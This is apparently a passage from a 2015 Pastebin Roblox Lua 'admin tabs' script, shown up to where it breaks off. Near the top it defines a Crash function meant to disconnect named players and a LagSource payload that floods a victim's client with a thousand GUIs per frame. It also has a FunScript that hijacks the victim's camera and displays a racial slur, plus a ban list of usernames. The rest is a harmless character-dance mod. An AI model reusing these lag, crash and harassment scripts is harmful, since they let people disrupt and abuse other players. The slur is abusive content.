Advertisement
candissss

Untitled

Aug 3rd, 2015
329
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 132.30 KB | None | 0 0
  1. --Welcome To Dominus Tabs!
  2. --Created by LuaScripterSB and thebuilder307
  3. --Dont take credit for this sript
  4. --This script is not an FM or a pastebin
  5. --kbai, nau
  6.  
  7. Music = { }
  8. Music["Talk Dirty"] = 148952593
  9. Music["Nana"] = 155425213
  10. Music["Fancy"] = 151667588
  11. Music["Chamillionaire Ridin Dirty "] = 143735700
  12. Music["Raining Tacos "] = 151430448
  13. Music["Drop The World"] = 153445566
  14. Music["No hands"] = 143279678
  15. Music["Happy"] = 154622509
  16. Music["LMFAO Shots"] = 151430448
  17. Music["Opps I farted"] = 130798484
  18. Music["Thrift Shop"] = 135213728
  19. Music["Rack City Audio"] = 41495944
  20. Music["Everything is Awesome"] = 154618552
  21. Music["FUS RO DAH"] = 130776150
  22. Music["Drop That NaeNae Everyone!"] = 146054931
  23. Music["Turn Down For What"] = 143959455
  24.  
  25. wait ()
  26. LocalPlayer = game:service("Players").LocalPlayer
  27. script.Parent = __DOMINUS__
  28. Tabs = {}
  29. Cmds = {}
  30. key = "/"
  31. chatgui = false
  32. probemode = false
  33. Safe = "thebuilder307"
  34. connection = nil
  35. Updates = " No New Current Updates, Sorry :c"
  36.  
  37. --not sure if it will work.
  38. --BRanks = -1 = Kick, -2 = Lag, -3 = Mute, -4 = Rejoin
  39.  
  40.  
  41. tabmodel = Instance.new("Model", Workspace)
  42. tabmodel.Name = "Dominus tabs"
  43. SourceName = "DSource"
  44. Banlist = {"hibeyblade","iKrypto"}
  45.  
  46.  
  47. function Crash(name)
  48. name = tostring(name or "nil")
  49. local t = Instance.new("StringValue")
  50. t.Name = "DISC: "..name
  51. t.Parent = game.Lighting
  52. game:GetService("Debris"):AddItem(t,1)
  53. end
  54.  
  55. LagSource = [==[
  56. wait(0)
  57. script.Parent = nil
  58. plr = game:GetService("Players").LocalPlayer
  59. local plrgui = plr:findFirstChild("PlayerGui")
  60. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  61. while plr.Parent == game:GetService("Players") do
  62. wait()
  63. for i = 1, 1000 do
  64. local sc = Instance.new("ScreenGui",plrgui)
  65. local fr = Instance.new("TextLabel",sc)
  66. fr.Text = "LAGGING"
  67. fr.Size = UDim2.new(1, 0, 1, 0)
  68. fr.FontSize = "Size48"
  69. end
  70. end
  71. ]==]
  72.  
  73. FunScript = [[
  74. LP = game:service'Players'.LocalPlayer
  75. Shapes = {"Ball", "Block"}
  76. wait()
  77. script.Parent = nil
  78. Delay(0, function()
  79. while wait() do
  80. workspace.CurrentCamera.CameraType = "Scriptable"
  81. workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5)
  82. workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075)
  83. workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  84. local Part = Instance.new("Part", workspace.CurrentCamera)
  85. Part.Shape = Shapes[math.random(1, 2)]
  86. Part.Anchored = true
  87. Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random())
  88. Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10))
  89. Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random())
  90. local Smoke = Instance.new("Smoke", Part)
  91. Smoke.Color = Color3.new(math.random(), math.random(), math.random())
  92. Smoke.Opacity = 0.7
  93. local Sparkles = Instance.new("Sparkles", Part)
  94. Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random())
  95. local Fire = Instance.new("Fire", Part)
  96. Fire.Color = Color3.new(math.random(), math.random(), math.random())
  97. Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random())
  98. local Ex = Instance.new("Explosion", workspace.CurrentCamera)
  99. Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250))
  100. Ex.BlastPressure = 15
  101. Ex.BlastRadius = 12.5
  102. if not workspace.CurrentCamera:findFirstChild("Hint") then
  103. local mes = Instance.new("Hint", workspace.CurrentCamera)
  104. mes.Text = "OMG STOP FUCKING WITH MY SHIT YOU STUPID NIGGA"
  105. end
  106. end
  107. end)
  108. ]]
  109.  
  110. MiniPeepScript = [[
  111. local ran,err = ypcall(function()
  112. plr = game:service'Players'.LocalPlayer
  113. char = plr.Character
  114. mouse = plr:GetMouse()
  115. humanoid = char:findFirstChild("Humanoid")
  116. torso = char:findFirstChild("Torso")
  117. head = char.Head
  118. ra = char:findFirstChild("Right Arm")
  119. la = char:findFirstChild("Left Arm")
  120. rl = char:findFirstChild("Right Leg")
  121. ll = char:findFirstChild("Left Leg")
  122. rs = torso:findFirstChild("Right Shoulder")
  123. ls = torso:findFirstChild("Left Shoulder")
  124. rh = torso:findFirstChild("Right Hip")
  125. lh = torso:findFirstChild("Left Hip")
  126. neck = torso:findFirstChild("Neck")
  127. rj = char:findFirstChild("HumanoidRootPart"):findFirstChild("RootJoint")
  128. anim = char:findFirstChild("Animate")
  129. rootpart = char:findFirstChild("HumanoidRootPart")
  130. camera = workspace.CurrentCamera
  131. if anim then
  132. anim:Destroy()
  133. end
  134. rj.C0 = CFrame.new()
  135. rj.C1 = CFrame.new()
  136. super_annoying = Instance.new("Sound", head)
  137. super_annoying.SoundId = "http://www.roblox.com/asset/?id=164161056"
  138. super_annoying.Volume = 1
  139. super_annoying.Looped = true
  140. uni = Instance.new("Sound", head)
  141. uni.SoundId = "http://www.roblox.com/asset/?id=145105874"
  142. uni.Volume = 1
  143. uni.Looped = true
  144. ann = Instance.new("Sound", head)
  145. ann.SoundId = "http://www.roblox.com/asset/?id=150199842"
  146. ann.Volume = 1
  147. ann.Looped = true
  148. fwutters = Instance.new("Sound", head)
  149. fwutters.SoundId = "http://www.roblox.com/asset/?id=148896355"
  150. fwutters.Volume = 1
  151. fwutters.Looped = true
  152. loll = Instance.new("Sound", head)
  153. loll.SoundId = "http://www.roblox.com/asset/?id=142599461"
  154. loll.Volume = 1
  155. loll.Looped = true
  156. land_of_swords = Instance.new("Sound", head)
  157. land_of_swords.SoundId = "http://www.roblox.com/asset/?id=145170576"
  158. land_of_swords.Volume = 1
  159. land_of_swords.Looped = true
  160. qq = Instance.new("Sound", head)
  161. qq.SoundId = "http://www.roblox.com/asset/?id=142295308"
  162. qq.Volume = 1
  163. qq.Looped = true
  164. doge = Instance.new("Sound", head)
  165. doge.SoundId = "http://www.roblox.com/asset/?id=138213729"
  166. doge.Volume = 1
  167. doge.Looped = true
  168. nyan = Instance.new("Sound", head)
  169. nyan.SoundId = "http://www.roblox.com/asset/?id=142332086"
  170. nyan.Volume = 1
  171. nyan.Looped = true
  172. sctmn = Instance.new("Sound", head)
  173. sctmn.SoundId = "http://www.roblox.com/asset/?id=143620887"
  174. sctmn.Volume = 1
  175. sctmn.Looped = true
  176. barrel_roll = Instance.new("Sound", head)
  177. barrel_roll.SoundId = "http://www.roblox.com/asset/?id=143735700"
  178. barrel_roll.Volume = 1
  179. barrel_roll.Looped = true
  180. dubstep_gun = Instance.new("Sound", head)
  181. dubstep_gun.SoundId = "http://www.roblox.com/asset/?id=148457569"
  182. dubstep_gun.Volume = 1.5
  183. dubstep_gun.Looped = true
  184. you_are_pirate = Instance.new("Sound", head)
  185. you_are_pirate.SoundId = "http://www.roblox.com/asset/?id=148896147"
  186. you_are_pirate.Volume = 1
  187. you_are_pirate.Looped = true
  188. cant_touch = Instance.new("Sound", head)
  189. cant_touch.SoundId = "http://www.roblox.com/asset/?id=163867583"
  190. cant_touch.Volume = 1
  191. cant_touch.Looped = true
  192. gangy_style = Instance.new("Sound", head)
  193. gangy_style.SoundId = "http://www.roblox.com/asset/?id=130844430"
  194. gangy_style.Volume = 1
  195. gangy_style.Looped = true
  196. fox_say = Instance.new("Sound", head)
  197. fox_say.SoundId = "http://www.roblox.com/asset/?id=143110546"
  198. fox_say.Volume = 1
  199. fox_say.Looped = true
  200. durk = Instance.new("Sound", head)
  201. durk.SoundId = "http://www.roblox.com/asset/?id=144373608"
  202. durk.Volume = 1
  203. durk.Looped = true
  204. sax_guy = Instance.new("Sound", head)
  205. sax_guy.SoundId = "http://www.roblox.com/asset/?id=130794684"
  206. sax_guy.Volume = 1
  207. sax_guy.Looped = true
  208. heman = Instance.new("Sound", head)
  209. heman.SoundId = "http://www.roblox.com/asset/?id=145144013"
  210. heman.Volume = 1
  211. heman.Looped = true
  212. justin = Instance.new("Sound", head)
  213. justin.SoundId = "http://www.roblox.com/asset/?id=157207595"
  214. justin.Volume = 1
  215. justin.Looped = true
  216. brony_music = Instance.new("Sound", head)
  217. brony_music.SoundId = "http://www.roblox.com/asset/?id=144194368"
  218. brony_music.Volume = 1
  219. brony_music.Looped = true
  220. spitfire = Instance.new("Sound", head)
  221. spitfire.SoundId = "http://www.roblox.com/asset/?id=145934228"
  222. spitfire.Volume = 1
  223. spitfire.Looped = true
  224. burn_dem = Instance.new("Sound", head)
  225. burn_dem.SoundId = "http://www.roblox.com/asset/?id=146599028"
  226. burn_dem.Volume = 1
  227. burn_dem.Looped = true
  228. cant = Instance.new("Sound", head)
  229. cant.SoundId = "http://www.roblox.com/asset/?id=131122314"
  230. cant.Volume = 1
  231. cant.Looped = true
  232. if char:findFirstChild("Shirt") then
  233. char:findFirstChild("Shirt"):Destroy()
  234. end
  235. if char:findFirstChild("Pants") then
  236. char:findFirstChild("Pants"):Destroy()
  237. end
  238. if char:findFirstChild("Shirt Graphic") then
  239. char:findFirstChild("Shirt Graphic"):Destroy()
  240. end
  241. Instance.new("HumanoidController", game:service'ControllerService')
  242. Instance.new("SkateboardController", game:service'ControllerService')
  243. Instance.new("VehicleController", game:service'ControllerService')
  244. rh.Parent = nil
  245. lh.Parent = nil
  246. rs.Parent = nil
  247. ls.Parent = nil
  248. neck.Parent = nil
  249. rj.Parent = nil
  250. rl.FormFactor = "Custom"
  251. ll.FormFactor = "Custom"
  252. ra.FormFactor = "Custom"
  253. la.FormFactor = "Custom"
  254. torso.FormFactor = "Custom"
  255. head.FormFactor = "Custom"
  256. rootpart.FormFactor = "Custom"
  257. rootpart.Size = Vector3.new(.4, .4, .2)
  258. rl.Size = Vector3.new(.2, .4, .2)
  259. ll.Size = Vector3.new(.2, .4, .2)
  260. ra.Size = Vector3.new(.2, .4, .2)
  261. la.Size = Vector3.new(.2, .4, .2)
  262. torso.Size = Vector3.new(.4, .4, .2)
  263. head.Size = Vector3.new(.4, .2, .2)
  264. rh.Parent = torso
  265. lh.Parent = torso
  266. rs.Parent = torso
  267. ls.Parent = torso
  268. neck.Parent = torso
  269. rj.Parent = rootpart
  270. if torso:findFirstChild("roblox") then
  271. local p = Instance.new("Part", char)
  272. p.FormFactor = "Custom"
  273. p.Size = torso.Size
  274. p.Transparency = 1
  275. p:BreakJoints()
  276. local w = Instance.new("Weld", char)
  277. w.Part0 = p
  278. w.Part1 = torso
  279. torso:findFirstChild("roblox").Parent = p
  280. end
  281. mesh1 = Instance.new("SpecialMesh", torso)
  282. mesh1.Name = "Mesh"
  283. mesh1.Scale = torso.Size - Vector3.new(torso.Size.x/2, torso.Size.y/2, 0)
  284. mesh1.MeshId = "rbxasset://fonts/torso.mesh"
  285. mesh2 = Instance.new("SpecialMesh", la)
  286. mesh2.Name = "Mesh"
  287. mesh2.Scale = la.Size - Vector3.new(0, la.Size.y/2, 0)
  288. mesh2.MeshId = "rbxasset://fonts/leftarm.mesh"
  289. mesh3 = Instance.new("SpecialMesh", ra)
  290. mesh3.Name = "Mesh"
  291. mesh3.Scale = ra.Size - Vector3.new(0, ra.Size.y/2, 0)
  292. mesh3.MeshId = "rbxasset://fonts/rightarm.mesh"
  293. mesh4 = Instance.new("SpecialMesh", ll)
  294. mesh4.Name = "Mesh"
  295. mesh4.Scale = ll.Size - Vector3.new(0, ll.Size.y/2, 0)
  296. mesh4.MeshId = "rbxasset://fonts/leftleg.mesh"
  297. mesh5 = Instance.new("SpecialMesh", rl)
  298. mesh5.Name = "Mesh"
  299. mesh5.Scale = rl.Size - Vector3.new(0, rl.Size.y/2, 0)
  300. mesh5.MeshId = "rbxasset://fonts/rightleg.mesh"
  301. ls.C0 = CFrame.new(-.3,.1,0)
  302. ls.C1 = CFrame.new(0,.1,0)
  303. rs.C0 = CFrame.new(.3,.1,0)
  304. rs.C1 = CFrame.new(0,.1,0)
  305. rh.C0 = CFrame.new(.1,-.2,0)
  306. rh.C1 = CFrame.new(0, .2, 0)
  307. lh.C0 = CFrame.new(-.1,-.2,0)
  308. lh.C1 = CFrame.new(0, .2, 0)
  309. neck.C0 = CFrame.new(0,.2,0)
  310. neck.C1 = CFrame.new(0,-.1,0)
  311. bodyc = char:findFirstChild("Body Colors")
  312. if bodyc then
  313. bodyc:Destroy()
  314. end
  315. wait(0.1)
  316. skincolor = {"Pastel brown"}
  317. clothcolor = {"Dark green", "Really red","Bright yellow","Bright orange","Lavender","Royal purple","Bright blue","Toothpaste","Institutional white","Hot pink"}
  318. skincolorrandom = BrickColor.new(skincolor[math.random(1, #skincolor)])
  319. clothcolorrandom = BrickColor.new(clothcolor[math.random(1, #clothcolor)])
  320. function restorecolors()
  321. for _,bp in pairs(char:children()) do
  322. if bp:IsA("BasePart") then
  323. bp.BrickColor = skincolorrandom
  324. end
  325. end
  326. torso.BrickColor = clothcolorrandom
  327. ll.BrickColor = clothcolorrandom
  328. rl.BrickColor = clothcolorrandom
  329. end
  330. restorecolors()
  331. local LightForTorso = Instance.new("PointLight", head)
  332. LightForTorso.Range = 15
  333. LightForTorso.Brightness = 20
  334. coroutine.wrap(function()
  335. while LightForTorso ~= nil do
  336. LightForTorso.Color = Color3.new(math.random(), math.random(), math.random())
  337. wait(0.3)
  338. end
  339. end)()
  340. local slidecount = 0
  341. local slidecountmax = 0
  342. local anim = ""
  343. local lastanim = anim
  344. local speed = 0
  345. local looking = false
  346. local dancing = false
  347. local superannoying = false
  348. local barrelroll = false
  349. local dubstepgun = false
  350. local foxie = false
  351. local durka = false
  352. local saxguy = false
  353. local heya = false
  354. local jb = false
  355. local bronymusic = false
  356. local sheddy = false
  357. local burndem = false
  358. local canttt = false
  359. local global_wait = 0
  360. count = 0
  361. countspeed = 1
  362. sine = 0
  363. sinespeed = 1
  364. humanoid.WalkSpeed = 20
  365. local controllerService = game:GetService("ControllerService")
  366. local controller = controllerService:GetChildren()[1]
  367. local colors = {"Really blue", "Lime green","Really blue","Lime green","Really blue","Lime green","Really blue","Lime green","Really blue","Lime green"}
  368. humanoid.Died:connect(function()
  369. for cframe_parts = 0, 100 do
  370. local p = Instance.new("Part")
  371. p.FormFactor = "Custom"
  372. p.BrickColor = BrickColor.new(colors[math.random(1, #colors)])
  373. p.Size = Vector3.new(1, 1, 1)
  374. Instance.new("BlockMesh", p).Scale = Vector3.new(0.05, 0.05, 0.05)
  375. p.Locked = true
  376. p.CanCollide = false
  377. p.Anchored = true
  378. p.CFrame = torso.CFrame * CFrame.Angles(math.random(-36, 36),math.random(-36, 36),math.random(-36, 36))
  379. p.Parent = workspace
  380. game:service'Debris':AddItem(p, 5)
  381. coroutine.wrap(function()
  382. while wait() do
  383. if p ~= nil then
  384. p.CFrame = p.CFrame * CFrame.new(0, 0.085, 0)
  385. p.Mesh.Scale = p.Mesh.Scale - Vector3.new(0.005, 0, 0.005) + Vector3.new(0, 0.01, 0)
  386. p.Transparency = p.Transparency + 0.015
  387. else
  388. break
  389. end
  390. end
  391. end)()
  392. end
  393. for _,v in pairs(char:children()) do
  394. if v:IsA("Part") then
  395. v:Destroy()
  396. end
  397. end
  398. end)
  399. mouse.KeyDown:connect(function(k)
  400. if string.byte(k) == 50 then
  401. if dancing then return end
  402. sitting = not sitting
  403. if sitting then
  404. local ray = Ray.new(torso.Position, Vector3.new(0, -1, 0))
  405. local hitz,enz = workspace:FindPartOnRay(ray, char)
  406. if hitz then
  407. controller.Parent = nil
  408. humanoid.WalkSpeed = 0
  409. coroutine.wrap(function()
  410. while wait() do
  411. humanoid.PlatformStand = true
  412. if sitting == false then humanoid.PlatformStand = false break end
  413. end
  414. end)()
  415. rj.C0 = CFrame.new(0, -0.35, 0) * CFrame.Angles(math.rad(10), 0, 0)
  416. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, -math.pi/16)
  417. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, math.pi/16)
  418. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(-math.rad(10), 0, -math.pi/10)
  419. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-math.rad(10), 0, math.pi/10)
  420. miniweld = Instance.new("Weld", char)
  421. miniweld.C0 = hitz.CFrame:toObjectSpace(rootpart.CFrame)
  422. miniweld.Part0 = hitz
  423. miniweld.Part1 = rootpart
  424. else
  425. sitting = false
  426. return
  427. end
  428. else
  429. if miniweld then
  430. miniweld:Destroy()
  431. end
  432. controller.Parent = controllerService
  433. humanoid.PlatformStand = false
  434. humanoid.WalkSpeed = 30
  435. end
  436. end
  437. if string.byte(k) == 32 then
  438. fwutters:Stop()
  439. uni:Stop()
  440. loll:Stop()
  441. qq:Stop()
  442. ann:Stop()
  443. nyan:Stop()
  444. sctmn:Stop()
  445. cant:Stop()
  446. superannoying = false
  447. barrelroll = false
  448. heya = false
  449. dubstepgun = false
  450. youpirate = false
  451. canttouch = false
  452. gangnam = false
  453. sheddy = false
  454. durka = false
  455. saxguy = false
  456. foxie = false
  457. burndem = false
  458. bronymusic = false
  459. canttt = false
  460. land_of_swords:stop()
  461. brony_music:stop()
  462. fox_say:stop()
  463. spitfire:stop()
  464. heman:stop()
  465. doge:Stop()
  466. justin:stop()
  467. jb = false
  468. durk:stop()
  469. restorecolors()
  470. burn_dem:stop()
  471. if hat then
  472. hat:Destroy()
  473. end
  474. sax_guy:stop()
  475. gangy_style:stop()
  476. cant_touch:stop()
  477. you_are_pirate:stop()
  478. dubstep_gun:stop()
  479. super_annoying:stop()
  480. barrel_roll:stop()
  481. dancing = false
  482. global_wait = 0
  483. LightForTorso.Color = torso.BrickColor.Color
  484. end
  485. if k == "z" then
  486. if dancing then return end
  487. if not sitting then
  488. dancing = true
  489. game:GetService("Chat"):Chat(head,"Pinkie Pie's Theme!",0)
  490. jb = true
  491. super_annoying:play()
  492. hat = Instance.new("Part", char)
  493. hat.FormFactor = "Custom"
  494. hat.CanCollide = false
  495. hat.Size = head.Size
  496. hat.Locked = true
  497. hat:breakJoints()
  498. local hatmesh = Instance.new("SpecialMesh", hat)
  499. hatmesh.MeshId = "http://www.roblox.com/asset/?id=nope"
  500. hatmesh.TextureId = "http://www.roblox.com/asset/?id=nope"
  501. hatmesh.Scale = Vector3.new(.2, .2, .2)
  502. local hatweld = Instance.new("Weld", hat)
  503. hatweld.Part0 = hat
  504. hatweld.Part1 = head
  505. hatweld.C0 = CFrame.new(0, -0.2, 0)
  506. end
  507. end
  508. if k == "=" then
  509. if dancing then return end
  510. if not sitting then
  511. dancing = true
  512. canttt = true
  513. cant:play()
  514. game:GetService("Chat"):Chat(head,"Can't touch me!",0)
  515. end
  516. end
  517. if k == "u" then
  518. if dancing then return end
  519. if not sitting then
  520. dancing = true
  521. game:GetService("Chat"):Chat(head,"I'm a scat man!",0)
  522. saxguy = true
  523. sctmn:play()
  524. hat = Instance.new("Part", char)
  525. hat.FormFactor = "Custom"
  526. hat.CanCollide = false
  527. hat.Size = head.Size
  528. hat.Locked = true
  529. hat:breakJoints()
  530. local hatmesh = Instance.new("SpecialMesh", hat)
  531. hatmesh.MeshId = "http://www.roblox.com/asset/?id=43996479"
  532. hatmesh.TextureId = "http://www.roblox.com/asset/?id=43997070"
  533. hatmesh.Scale = Vector3.new(.0925, .0925, .0925)
  534. local hatweld = Instance.new("Weld", hat)
  535. hatweld.Part0 = hat
  536. hatweld.Part1 = la
  537. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  538. end
  539. end
  540.  
  541. if k == "k" then
  542. if dancing then return end
  543. if not sitting then
  544. dancing = true
  545. game:GetService("Chat"):Chat(head,"Drop It!",0)
  546. sheddy = true
  547. spitfire:play()
  548. end
  549. end
  550. if k == "[" then
  551. if dancing then return end
  552. if not sitting then
  553. dancing = true
  554. game:GetService("Chat"):Chat(head,"Happy!",0)
  555. foxie = true
  556. land_of_swords:play()
  557. hat = Instance.new("Part", char)
  558. hat.FormFactor = "Custom"
  559. hat.CanCollide = false
  560. hat.Size = head.Size
  561. hat.Locked = true
  562. hat:breakJoints()
  563. local hatmesh = Instance.new("SpecialMesh", hat)
  564. hatmesh.MeshId = "http://www.roblox.com/asset/?id=13640868"
  565. hatmesh.TextureId = "http://www.roblox.com/asset/?id=13640869"
  566. hatmesh.Scale = Vector3.new(.25, .25, .25)
  567. local hatweld = Instance.new("Weld", hat)
  568. hatweld.Part0 = hat
  569. hatweld.Part1 = la
  570. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  571. end
  572. end
  573.  
  574. if k == "p" then
  575. if dancing then return end
  576. if not sitting then
  577. dancing = true
  578. foxie = true
  579. game:GetService("Chat"):Chat(head,"It's raining tacos!",0)
  580. qq:play()
  581. hat = Instance.new("Part", char)
  582. hat.FormFactor = "Custom"
  583. hat.CanCollide = false
  584. hat.Size = head.Size
  585. hat.Locked = true
  586. hat:breakJoints()
  587. local hatmesh = Instance.new("SpecialMesh", hat)
  588. hatmesh.MeshId = "http://www.roblox.com/asset/?id=14846869"
  589. hatmesh.TextureId = "http://www.roblox.com/asset/?id=14846834"
  590. hatmesh.Scale = Vector3.new(.25, .25, .25)
  591. local hatweld = Instance.new("Weld", hat)
  592. hatweld.Part0 = hat
  593. hatweld.Part1 = la
  594. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  595. end
  596. end
  597.  
  598. if k == ";" then
  599. if dancing then return end
  600. if not sitting then
  601. dancing = true
  602. game:GetService("Chat"):Chat(head,"Winter Wrap Up!",0)
  603. heya = true
  604. uni:play()
  605. hat = Instance.new("Part", char)
  606. hat.FormFactor = "Custom"
  607. hat.CanCollide = false
  608. hat.Size = head.Size
  609. hat.Locked = true
  610. hat:breakJoints()
  611. local hatmesh = Instance.new("SpecialMesh", hat)
  612. hatmesh.MeshId = "http://www.roblox.com/asset/?id=84003494"
  613. hatmesh.TextureId = "http://www.roblox.com/asset/?id=83992632"
  614. hatmesh.Scale = Vector3.new(.25, .25, .25)
  615. local hatweld = Instance.new("Weld", hat)
  616. hatweld.Part0 = hat
  617. hatweld.Part1 = la
  618. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  619. end
  620. end
  621.  
  622. if k == "n" then
  623. if dancing then return end
  624. if not sitting then
  625. dancing = true
  626. game:GetService("Chat"):Chat(head,"Gangnam Style!",0)
  627. gangnam = true
  628. gangy_style:play()
  629. end
  630. end
  631. if k == "t" then
  632. if dancing then return end
  633. if not sitting then
  634. dancing = true
  635. game:GetService("Chat"):Chat(head,"#Best Teacher!",0)
  636. heya = true
  637. ann:play()
  638. end
  639. end
  640. if k == "-" then
  641. if dancing then return end
  642. if not sitting then
  643. dancing = true
  644. game:GetService("Chat"):Chat(head,"TRUX YEAH!!",0)
  645. heya = true
  646. loll:play()
  647. end
  648. end
  649.  
  650. if k == "r" then
  651. if dancing then return end
  652. if not sitting then
  653. dancing = true
  654. game:GetService("Chat"):Chat(head,"Love is in Bloom!",0)
  655. burndem = true
  656. burn_dem:play()
  657. end
  658. end
  659. if k == "x" then
  660. if dancing then return end
  661. if not sitting then
  662. dancing = true
  663. game:GetService("Chat"):Chat(head,"They See Me Rollin'!",0)
  664. barrelroll = true
  665. barrel_roll:play()
  666. hat = Instance.new("Part", char)
  667. hat.FormFactor = "Custom"
  668. hat.CanCollide = false
  669. hat.Size = torso.Size
  670. hat.Locked = true
  671. hat:breakJoints()
  672. local hatmesh = Instance.new("SpecialMesh", hat)
  673. hatmesh.MeshId = "http://www.roblox.com/asset/?id=29873142"
  674. hatmesh.TextureId = "http://www.roblox.com/asset/?id=31467063"
  675. hatmesh.Scale = Vector3.new(.22, .2, .22)
  676. local hatweld = Instance.new("Weld", hat)
  677. hatweld.Part0 = hat
  678. hatweld.Part1 = torso
  679. end
  680. end
  681. if k == "h" then
  682. if dancing then return end
  683. if not sitting then
  684. dancing = true
  685. game:GetService("Chat"):Chat(head,":D",0)
  686. heman:play()
  687. heya = true
  688. hat = Instance.new("Part", char)
  689. hat.FormFactor = "Custom"
  690. hat.CanCollide = false
  691. hat.Size = torso.Size + Vector3.new(0.01, 0.01, 0.01)
  692. hat.Locked = true
  693. hat.BrickColor = BrickColor.new("Hot pink")
  694. hat:breakJoints()
  695. local hatweld = Instance.new("Weld", hat)
  696. hatweld.Part0 = hat
  697. hatweld.Part1 = torso
  698. end
  699. end
  700. if k == "j" then
  701. if dancing then return end
  702. if not sitting then
  703. dancing = true
  704. game:GetService("Chat"):Chat(head,"Luna! >:o",0)
  705. justin:play()
  706. jb = true
  707. hat = Instance.new("Part", char)
  708. hat.FormFactor = "Custom"
  709. hat.CanCollide = false
  710. hat.Size = head.Size
  711. hat.Locked = true
  712. hat.BrickColor = BrickColor.new("Hot pink")
  713. hat:breakJoints()
  714. local hatmesh = Instance.new("SpecialMesh", hat)
  715. hatmesh.MeshId = "http://www.roblox.com/asset/?id=nope"
  716. hatmesh.TextureId = "http://www.roblox.com/asset/?id=nope"
  717. hatmesh.Scale = Vector3.new(.23, .23, .23)
  718. local hatweld = Instance.new("Weld", hat)
  719. hatweld.Part0 = hat
  720. hatweld.Part1 = head
  721. hatweld.C0 = CFrame.new(0.025, -0.05, 0)
  722. end
  723. end
  724.  
  725. if k == "'" then
  726. if dancing then return end
  727. if not sitting then
  728. dancing = true
  729. fwutters:play()
  730. game:GetService("Chat"):Chat(head,"Da Fwutters!",0)
  731. bronymusic = true
  732. for _,bp in pairs(char:children()) do
  733. if bp:IsA("BasePart") then
  734. bp.BrickColor = BrickColor.new("Cool yellow")
  735. end
  736. end
  737. hat = Instance.new("Part", char)
  738. hat.FormFactor = "Custom"
  739. hat.CanCollide = false
  740. hat.Size = head.Size
  741. hat.Locked = true
  742. hat.BrickColor = BrickColor.new("Cool yellow")
  743. hat:breakJoints()
  744. local hatmesh = Instance.new("SpecialMesh", hat)
  745. hatmesh.MeshId = "http://www.roblox.com/asset/?id=82348513"
  746. hatmesh.TextureId = "http://www.roblox.com/asset/?id=36527326"
  747. hatmesh.Scale = Vector3.new(.28, .28, .28)
  748. local hatweld = Instance.new("Weld", hat)
  749. hatweld.Part0 = hat
  750. hatweld.Part1 = head
  751. hatweld.C0 = CFrame.new(0.025, 0, 0)
  752. end
  753. end
  754.  
  755. if k == "c" then
  756. if dancing then return end
  757. if not sitting then
  758. dancing = true
  759. game:GetService("Chat"):Chat(head,"Yay!",0)
  760. dubstepgun = true
  761. dubstep_gun:play()
  762. end
  763. end
  764.  
  765. if k == "v" then
  766. if dancing then return end
  767. if not sitting then
  768. dancing = true
  769. game:GetService("Chat"):Chat(head,"What a Strange New World!",0)
  770. youpirate = true
  771. you_are_pirate:play()
  772. hat = Instance.new("Part", char)
  773. hat.FormFactor = "Custom"
  774. hat.CanCollide = false
  775. hat.Size = head.Size
  776. hat.Locked = true
  777. hat:breakJoints()
  778. local hatmesh = Instance.new("SpecialMesh", hat)
  779. hatmesh.MeshId = "http://www.roblox.com/asset/?id=nope"
  780. hatmesh.TextureId = "http://www.roblox.com/asset/?id=nope"
  781. hatmesh.Scale = Vector3.new(.2, .2, .2)
  782. local hatweld = Instance.new("Weld", hat)
  783. hatweld.Part0 = hat
  784. hatweld.Part1 = head
  785. hatweld.C0 = CFrame.new(0, -0.15, 0)
  786. end
  787. end
  788. if k == "m" then
  789. if dancing then return end
  790. if not sitting then
  791. dancing = true
  792. game:GetService("Chat"):Chat(head,"Fluttershy's Theme!",0)
  793. canttouch = true
  794. cant_touch:play()
  795. end
  796. end
  797. if k == "b" then
  798. if dancing then return end
  799. if not sitting then
  800. dancing = true
  801. game:GetService("Chat"):Chat(head,"Come on and SMILE!",0)
  802. bronymusic = true
  803. brony_music:play()
  804. for _,bp in pairs(char:children()) do
  805. if bp:IsA("BasePart") then
  806. bp.BrickColor = BrickColor.new("Pink")
  807. end
  808. end
  809. hat = Instance.new("Part", char)
  810. hat.FormFactor = "Custom"
  811. hat.CanCollide = false
  812. hat.Size = head.Size
  813. hat.Locked = true
  814. hat.BrickColor = BrickColor.new("Lavender")
  815. hat:breakJoints()
  816. local hatmesh = Instance.new("SpecialMesh", hat)
  817. hatmesh.MeshId = "http://www.roblox.com/asset/?id=1095708"
  818. hatmesh.TextureId = "http://www.roblox.com/asset/?id=60375192"
  819. hatmesh.Scale = Vector3.new(.25, .25, .45)
  820. local hatweld = Instance.new("Weld", hat)
  821. hatweld.Part0 = hat
  822. hatweld.Part1 = head
  823. hatweld.C0 = CFrame.new(0, -0.1, 0.05)
  824. end
  825. end
  826.  
  827. if k == "y" then
  828. if dancing then return end
  829. if not sitting then
  830. dancing = true
  831. bronymusic = true
  832. nyan:play()
  833. for _,bp in pairs(char:children()) do
  834. if bp:IsA("BasePart") then
